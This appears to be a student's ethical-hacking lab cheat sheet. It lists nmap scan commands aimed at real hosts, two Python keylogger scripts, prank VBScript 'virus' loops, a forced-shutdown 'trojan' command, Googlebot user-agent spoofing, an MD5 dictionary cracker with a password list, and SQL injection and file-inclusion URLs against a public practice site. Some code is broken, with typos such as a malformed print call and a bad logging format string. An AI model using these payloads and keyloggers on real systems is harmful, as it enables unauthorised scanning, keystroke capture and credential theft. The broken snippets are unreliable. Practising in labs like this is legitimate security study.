Websites :

--> whois (http://whois.domaintools.com)

--> web.archieve.org -> wayback machine

--> https://www.techpanda.org/index.php

--> https://www.md5hashgenerator.com/

--> https://crackstation.net/

--> http://testphp.vulnweb.com/login.php

------------------------------------------------------------------

Scanning :

  nmap www.google.com

  nmap -open www.google.com

single port : nmap -p 80 nmitd.edu.in

range : nmap -p 1-200 www.google.com / 103.108.220.91

top 100 : nmap -F www.google.com

ping scan : nmap -sP www.google.com

host scan : nmap -sn www.google.com / 192.168.52.182/24

DNS query : nmap -sL 192.168.52.182/24

UDP scan : nmap -sU www.google.com

OS scan : nmap -O 192.168.54.147

protocol : nmap -sO www.google.com

Version : nmap -sV 103.108.220.51

  : ipconfig, ping, tracert, netstat

------------------------------------------------------------------

Keylogger :

import keyboard as kb

rec = kb.record(until="escape")

seq = kb.get_typed_strings(rec)

print("",join(seq))

 OR

from pynput.keyboard import Key,Listener

import logging

logdir = "C:/Key/" logging.basicConfig(filename = (logdir + "KeyloggerDemo.txt"),level = logging.DEBUG, format = '%(acstime)s: %(message)s')

def on_press(key):

  logging.info(str(key))

with Listener (on_press = on_press) as

Listener:

Listener.join()

OR

from pynput.keyboard import Key, Listener

import logging

logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")

def on_press(key):

 logging.info(str(key))

with Listener(on_press=on_press) as listener :

 listener.join()

-----------------------------------------------------------------

Virus : save as .vbs

set x = wscript.CreateObject("wscript.shell")

 Dim a : a = 50

 For i = to a step 1

 wscript.sleep 50

 MsgBox("This is suspicious")

next

 MsgBox("Dang !!! You just clicked me 50 times.")

wscript.Quit

 OR

set x = wscript.CreateObject("wscript.shell")

 Dim a : a = 50

 For i = to a step 1

 wscript.sleep 50

 x.sendkeys"{CAPSLOCK}"

next

wscript.Quit

OR

set x = wscript.CreateObject("wscript.shell")

 dim a:a=1

 For i = a to 2 step 1

 wscript.sleep 50

 MsgBox("This is suspicious")

next

MsgBox("You clicked 2 times")

wscript.Quit

--------------------------------------------------------------

Trojan :

shutdown /s/f/t 15/c "You clicked a Trojan"

--------------------------------------------------------------

Google bot :

 www.whatsmybrowser.com

 https://useragentstring.com/Googlebot2.1_id_71.php

 about:config

 Googlebot/2.1 (+http://www.google.com/bot.html)

general.useragent.override -> click string -> type googlebot string

--------------------------------------------------------------

DVWA :

 xampp -> php -> php.ini -> allow_url_include = on

File Inclusion :

 create a folder with two txt files

------------------------------------------------------------------

Password Cracking - dictionary attack

https://www.md5hashgenerator.com/

https://crackstation.net/

execution : python md5_cracker.py

md5_cracker.py

import hashlib

def check_md5(md5_hash, password_file):

 with open(password_file, 'r') as file:

  for line in file:

   password = line.strip()

   hashed_password = hashlib.md5(password.encode()).hexdigest()

   if hashed_password == md5_hash:

    return password, hashed_password

 return None, None

if __name__ == "__main__":

 md5_input = input("Enter the MD5 hash: ").strip()

 dictionary_file = input("Enter the path to the password dictionary file: ").strip()

 matched_password, matched_md5 = check_md5(md5_input, dictionary_file)

 if matched_password:

  print(f"Password found: {matched_password}")

  print(f"MD5 hash: {matched_md5}")

 else:

  print("Password not found in the dictionary.")

pl.txt

pjazzword

123456

12345678

1234

qwerty

12345

dragon

candy

duncan

olivia

hunting

blink182

alicia

8888

samsung

bubba1

harvey

england

2323

seattle

ssssss

rose

harry

openup

pandora

lusys

tke

joey

seven

abc123

password

----------------------------------------------------------------------------------------

SQL Injection

username : http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,concat(user()),8,9,10,11%20from%20information_schema.schemata--

database_name : http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,database(),8,9,10,11--

version : http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,@@version,8,9,10,11--

table_name : http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,table_name,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()--





In-band SQL injection: Error-based SQL injection : http://testphp.vulnweb.com/listproducts.php?cat=1′

In-band SQL injection: Union-based SQL injection : http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,version(),current_user()

Blind SQL injection: Boolean-based SQL injection : http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1

http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0

Blind SQL injection: Time-based SQL injection : http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)

Out-of-band SQL injection: 1||UTL_HTTP.request(‘http://example.com/’)

------------------------------------------------------------------------------------------------

Remote File Inclusion

?page=http://www.google.com

